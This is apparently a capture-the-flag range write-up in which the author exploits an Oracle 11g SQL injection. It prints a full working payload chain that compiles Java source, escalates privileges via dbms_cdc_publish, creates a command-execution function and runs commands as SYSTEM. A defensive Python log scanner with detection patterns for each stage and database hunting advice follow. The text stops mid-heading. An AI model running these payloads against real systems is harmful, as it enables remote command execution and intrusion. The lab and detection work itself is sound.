Ichunqiu Yunjing (云境) - Endless (无间计划) Writeup
Author: 小离-xiaoli
0x00 Intro
Preface:
- There are two entry points: one is Pboot-CMS, the other is SQL injection.
- The external IPs of the entry points may be inconsistent in this write-up, because the range was restarted many times and the IPs changed frequently.
- OSCP style: no CS/MSF.
- This range has 12 flags in total.
0x01 Recon
Scan results:
(screenshot)
Entry point 1 - SQL injection (Linux):
(screenshot)
Entry point 2 - Pboot-CMS (Linux):
0x02 Entry point 1 - SQL injection (Linux)
Preface:
- This is an Oracle injection where the web server and the database are on separate hosts: the web server is Linux, but through the Oracle injection you can tell the database host is Windows. The DB user is not DBA and only has Java runtime permission (no screenshot for this part).
- The first few attempts failed and I was stuck for quite a while; later I set up an Oracle instance and tested it together with 九世.
- Using sqlmap is not recommended: it will knock the site over, and reading its source shows that sqlmap's privilege-escalation code defines no attack methods for Oracle.
- Oracle version:
  Oracle Database 11g Enterprise Edition Release 11.2.0.1.0
- Straight to the payloads
1. Create the Java source
```sql
admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual)>1 --
```
2. Privilege escalation
```sql
admin' AND (SELECT dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate '' begin sys.dbms_cdc_publish.create_change_set('''' a'''',''''a'''',''''a''''''''||TEST.pwn()||''''''''a'''',''''Y'''',s ysdate,sysdate);end;''; commit; end;') from dual)>1--
```
3. Create the function
```sql
admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LINXRUNCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual)>1--
```
4. Query the created function
```sql
admin' union select null,(select object_name from all_objects where object_name ='LINXRUNCMD' and rownum=1),null from dual--
```
5. Query the Java source
```sql
admin' union select null,(select object_name from all_objects where object_name ='LinxUtil'),null from dual--
```
6. Command execution
```sql
admin' union select null,(select LINXRUNCMD('whoami') from dual),null from dual--
```
(screenshot)
The function LINXRUNCMD was created successfully.
(screenshot)
whoami shows we are already running as SYSTEM.
(screenshot)
ipconfig shows the database host's internal IP is 172.23.4.51; now it is time to go back to entry point 2 to get into the internal network.
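From the defender's side, the chain above leaves very recognisable strings in the web tier before anything ever reaches the database: the `dbms_xmlquery.newcontext` wrapper used to execute PL/SQL from a query context, the `create or replace and compile java source` statement, the `language java name` wrapper function, the `dbms_cdc_publish` call and the `all_objects` lookups that check whether the objects landed. The following Python scanner is an added example, not part of the original write-up or any tool it mentions. It URL-decodes request paths from access-log lines (decoding twice to catch double-encoded input), matches each of those stages, and then correlates hits per source IP so that a single client touching several stages stands out. The log lines, IPs and indicator names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the write-up).
# Line 2 carries an abbreviated Java-source creation attempt, line 3 an
# all_objects lookup for the created function, lines 1 and 4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0800] "GET /login?user=admin&pass=x HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0800] "GET /login?user=admin%27+and+%28select+dbms_xmlquery.newcontext%28%27declare+PRAGMA+AUTONOMOUS_TRANSACTION%3Bbegin+execute+immediate+%27%27create+or+replace+and+compile+java+source+named+%22X%22+as+...%27%27%3Bcommit%3Bend%3B%27%29+from+dual%29%3E1+-- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:05 +0800] "GET /login?user=admin%27+union+select+null%2C%28select+object_name+from+all_objects+where+object_name%3D%27LINXRUNCMD%27%29%2Cnull+from+dual-- HTTP/1.1" 200 700
10.0.0.7 - - [01/Jan/2024:10:00:09 +0800] "GET /search?q=java+source+tutorial HTTP/1.1" 200 2048
"""

# Each indicator is keyed to the stage of the chain it belongs to.
# Whitespace is matched with \s+ because the payloads are free-form PL/SQL.
INDICATORS = {
    "exec_from_sqli":  re.compile(r"dbms_xmlquery\.newcontext", re.I),
    "java_source_def": re.compile(r"create\s+or\s+replace\s+(and\s+compile\s+)?java\s+source", re.I),
    "java_wrapper_fn": re.compile(r"language\s+java\s+name", re.I),
    "privesc_cdc":     re.compile(r"dbms_cdc_publish\.", re.I),
    "catalog_recon":   re.compile(r"from\s+all_objects\s+where\s+object_name", re.I),
    "autonomous_txn":  re.compile(r"pragma\s+autonomous_transaction", re.I),
}

# Common log format: ip ident user [timestamp] "METHOD path protocol" ...
REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"'
)


def normalize(raw):
    """URL-decode twice (catches double-encoded payloads) and collapse whitespace.
    Double decoding can alter a literal '+' or '%' in benign input, which is
    acceptable for a detector that only needs to see the indicator strings."""
    decoded = unquote_plus(unquote_plus(raw))
    return re.sub(r"\s+", " ", decoded)


def scan_line(line):
    """Return a hit record for one log line, or None if nothing matched."""
    m = REQ_RE.match(line)
    if not m:
        return None
    decoded = normalize(m.group("path"))
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "indicators": hits}


def scan_log(text):
    """Scan a whole log and keep only the lines that matched an indicator."""
    return [r for r in (scan_line(l) for l in text.splitlines()) if r]


def attack_chains(results):
    """Correlate hits per source IP: which stages of the chain each client touched.
    A client with several distinct stages is far more suspicious than a single hit."""
    chains = {}
    for r in results:
        chains.setdefault(r["ip"], set()).update(r["indicators"])
    return {ip: sorted(stages) for ip, stages in chains.items()}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for r in found:
        print(r["ts"], r["ip"], ", ".join(r["indicators"]))
    for ip, stages in attack_chains(found).items():
        print(f"{ip}: {len(stages)} stage(s) of the chain observed -> {stages}")
```

On the database side the same chain can be hunted after the fact: an application schema should normally own no `JAVA SOURCE` objects and no functions declared `as language java`, so a periodic query of `ALL_OBJECTS` filtered on `OBJECT_TYPE = 'JAVA SOURCE'` against the application account, plus auditing of `DBMS_XMLQUERY` and `DBMS_CDC_PUBLISH` executions from that account, covers the steps the web-log scanner above cannot see.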
## 0x0